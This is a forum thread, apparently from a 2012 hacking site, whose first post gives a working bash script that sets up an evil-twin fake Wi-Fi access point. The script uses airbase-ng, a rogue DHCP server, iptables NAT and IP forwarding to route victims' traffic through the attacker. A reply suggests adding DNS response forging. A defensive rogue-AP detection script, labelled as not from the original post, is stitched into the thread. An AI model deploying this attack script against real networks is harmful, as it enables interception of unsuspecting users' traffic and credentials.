Author Topic: [BASH] create an evil twin or fake access point


Offline RedBullAddicted

  • Moderator
  • Sir
  • Posts: 519
  • Cookies: 189
[BASH] create an evil twin or fake access point
« on: July 26, 2012, 12:25:14 pm »
Hi folks,

I just created a little bash script for backtrack 5 R2 to create an evil twin or fake access point.
For those who don't know what this is, try this link: http://en.wikipedia.org/wiki/Evil_twin_%28wireless_networks%29

I started with this tutorial and made many improvements: http://exploit.co.il/hacking/set-fake-access-point-backtrack5/

As I'm not an advanced bash scripter I hope somebody can make this a bit better than I can. Feel free to edit what you like  :)

For now this is a working script which I tested on backtrack 5 R2.
You need to install dhcp3-server before you start:
Code:
apt-get install dhcp3-server
Have fun with it

Code:
#!/bin/bash

##########################################
# create an evil twin access point       #
#                                        #
# written by: 8xsde9ed                   #
# tested on backtrack 5 R2               #
##########################################

#Killing active processes
echo "Killing airbase-ng"
pkill airbase-ng
sleep 2;
echo "Killing dhcpd"
pkill dhcpd3
sleep 2;

#Getting required information
echo -n "Enter your wlan interface and press [ENTER] (e.g. wlan0): "
read wlan_int
echo -n "Enter the subnet for your DHCP scope and press [ENTER] (e.g. 10.10.0.0): "
read dhcp_subnet
echo -n "Enter the subnetmask for your DHCP scope and press [ENTER] (e.g. 255.255.255.0): "
read dhcp_subnetmask
echo -n "Enter the broadcast address for your dhcp scope and press [ENTER] (e.g. 10.10.0.255): "
read dhcp_broadcast
echo -n "Enter the default gateway for your DHCP Scope and press [ENTER] (e.g. 10.10.0.10): "
read dhcp_dgw
echo -n "Enter the DNS Server for your DHCP Scope and press [ENTER] (e.g. 10.10.0.20): "
read dhcp_dns
echo -n "Enter the start address of your DHCP scope and press [ENTER] (e.g. 10.10.0.100): "
read dhcp_start
echo -n "Enter the last address of your DHCP scope and press [ENTER] (e.g. 10.10.0.150): "
read dhcp_last
echo -n "Enter the SSID you like to use for your Access Point and press [ENTER] (e.g. eviltwin): "
read ssid
echo -n "Enter the Channel you like to use for your Access Point and press [ENTER] (e.g. 11): "
read channel
echo -n "Enter the interface name which is connected to the internet and press [ENTER] (e.g. eth0): "
read inet_int

#If you want to you can put some user input validation here ...

#Setting dhcpd config to /etc/dhcp3/dhcpd.conf
echo "setting dhcpd config in /etc/dhcp3/dhcpd.conf"
sleep 2;
#check if there already is a backup directory for the original dhcpd.conf file

DIR="/etc/dhcp3/orig_conf"

if [ -d "$DIR" ]; then
    echo "You already have a backup directory for the original dhcpd.conf"
    sleep 2;
else
    echo "You do not have a backup directory for the original dhcpd.conf file... I create one"
    sleep 2;
    mkdir "$DIR"
fi

#check if there already is a backup of the original dhcpd.conf file. If not one will be created
if [ "$(ls -A "$DIR")" ]; then
     echo "You already have a backup of the original configuration file in /etc/dhcp3/orig_conf"
     sleep 2;
else
    echo "creating backup of original dhcpd config file to /etc/dhcp3/orig_conf"
    sleep 2;
    cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/orig_conf/dhcpd.conf
    rm /etc/dhcp3/dhcpd.conf
fi

echo "ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet $dhcp_subnet netmask $dhcp_subnetmask {
option subnet-mask $dhcp_subnetmask;
option broadcast-address $dhcp_broadcast;
option routers $dhcp_dgw;
option domain-name-servers $dhcp_dns;
range $dhcp_start $dhcp_last; }" > /etc/dhcp3/dhcpd.conf

#Starting monitor mode on $wlan_int
echo "putting $wlan_int into monitor mode. You can check that later by using iwconfig command"
sleep 2;
airmon-ng stop $wlan_int
sleep 5;
airmon-ng start $wlan_int
sleep 5;

#Starting airbase-ng with SSID=$ssid and channel=$channel
echo "starting airbase-ng with SSID $ssid and channel $channel"
sleep 2;
airbase-ng -e $ssid -c $channel -v $wlan_int &
sleep 5;

#starting new generated interface at0 and assign ip address
echo "starting at0 with ip $dhcp_dgw and subnetmask $dhcp_subnetmask and create a route for that"
sleep 2;
ifconfig at0 down
sleep 2;
ifconfig at0 $dhcp_dgw netmask $dhcp_subnetmask
sleep 2;
ifconfig at0 up
sleep 2;
route add -net $dhcp_subnet netmask $dhcp_subnetmask gw $dhcp_dgw
sleep 2;

#Setup iptables with nat for the new network
echo "setting up iptables with nat for the new network"
sleep 2;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $inet_int -j MASQUERADE

#Clear DHCP leases
echo "clearing dhcp leases"
sleep 2;
echo > '/var/lib/dhcp3/dhcpd.leases'

#creating a symlink to dhcpd.pid (-f so a second run does not fail on an existing link)
ln -sf /var/run/dhcp3-server/dhcp.pid /var/run/dhcpd.pid

#start dhcp server and enable ip forwarding
echo "starting dhcp and enabling ip forwarding"
sleep 2;
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
echo "1" > /proc/sys/net/ipv4/ip_forward
« Last Edit: July 26, 2012, 12:26:40 pm by 8xsde9ed »
Deep into that darkness peering, long I stood there, wondering, fearing, doubting, dreaming dreams no mortal ever dared to dream before. - Edgar Allan Poe
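From the defender's side, the interesting question is how the access point this script brings up looks to someone scanning the air: the same ESSID as the legitimate network, on a different BSSID, and (since airbase-ng is started without any encryption option) as an open network. The script below is an added example and is not part of the original post or of the tool it uses. It reads a constructed scan table of the form `BSSID CHANNEL PRIVACY ESSID` (any scanner output, e.g. airodump-ng or `iw dev <if> scan`, can be reduced to this shape) and reports two things: ESSIDs announced by more than one BSSID, which is normal in multi-AP deployments and only a weak signal, and ESSIDs that are encrypted on one BSSID but open on another, which is the stronger indicator. The function names and the sample data are the example's own.

```bash
#!/bin/bash
# Added example (not from the original post): spot likely evil twins in a
# wireless scan. One access point per input line:
#   BSSID CHANNEL PRIVACY ESSID   (ESSID may contain spaces)

# Constructed sample scan. "CoffeeShop" is announced by two BSSIDs, one of
# them open; "HomeNet" is announced twice but both encrypted (typical for a
# legitimate two-AP setup).
SAMPLE_SCAN='00:11:22:33:44:55 6 WPA2 CoffeeShop
00:11:22:33:44:66 6 WPA2 CoffeeShop-5G
AA:BB:CC:DD:EE:FF 11 OPN CoffeeShop
DE:AD:BE:EF:00:01 1 WPA2 HomeNet
DE:AD:BE:EF:00:02 11 WPA2 HomeNet'

# Weak signal: every ESSID seen from more than one BSSID.
# Output: "ESSID<TAB>bssid1,bssid2,..." sorted by ESSID.
duplicate_ssids() {
    awk '
        {
            essid = $4
            for (i = 5; i <= NF; i++) essid = essid " " $i
            if (essid in seen) seen[essid] = seen[essid] "," $1
            else seen[essid] = $1
            count[essid]++
        }
        END {
            for (e in count)
                if (count[e] > 1) print e "\t" seen[e]
        }
    ' | sort
}

# Strong signal: an ESSID that is encrypted on at least one BSSID and open
# (privacy field "OPN") on another. Output: "ESSID<TAB>open-bssid ...".
open_twins() {
    awk '
        {
            essid = $4
            for (i = 5; i <= NF; i++) essid = essid " " $i
            if ($3 == "OPN") open[essid] = open[essid] " " $1
            else enc[essid] = 1
        }
        END {
            for (e in open)
                if (e in enc) print e "\t" substr(open[e], 2)
        }
    ' | sort
}

# Number of findings a check produced; handy as an alerting threshold.
count_findings() { grep -c . ; }

echo "ESSIDs announced by more than one BSSID (weak signal):"
printf '%s\n' "$SAMPLE_SCAN" | duplicate_ssids
echo
echo "Encrypted ESSIDs that also appear as an open network (strong signal):"
printf '%s\n' "$SAMPLE_SCAN" | open_twins
```

Run against a real scan, the weak check will fire on every enterprise WLAN with more than one access point, so it is the open-versus-encrypted mismatch (plus a BSSID that is not in your own inventory) that is worth alerting on.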

Offline frog

  • Knight
  • Posts: 232
  • Cookies: 16
Re: [BASH] create an evil twin or fake access point
« Reply #1 on: August 02, 2012, 08:42:46 am »
I like the script; it clearly defines what needs to be done to accomplish such a task. If I were you I would adopt the techniques into another script with a higher, more automated purpose, starting from the ground up. Perhaps incorporating the setup of a fake access point (which you have already done) into a program that monitors the LAN for live hosts using ARP requests or looking for/sniffing DHCP requests? Maybe a little DNS request catching/response forging? This should be in key with what you are trying to accomplish.

Offline RedBullAddicted

  • Moderator
  • Sir
  • Posts: 519
  • Cookies: 189
Re: [BASH] create an evil twin or fake access point
« Reply #2 on: August 05, 2012, 03:58:15 pm »
Hi frog,

thanks for your reply. I'm very new to programming. This is the reason why I registered to this forum  :) Your idea sounds great but I don't think I'm able to do such a program/script at the moment. But I keep on learning.

Cheers,
8xsde9ed

Offline frog

  • Knight
  • Posts: 232
  • Cookies: 16
Re: [BASH] create an evil twin or fake access point
« Reply #3 on: August 06, 2012, 11:25:20 pm »
I like your attitude; keep on going. That's what it's all about; progress, practice, research, and doing what you enjoy.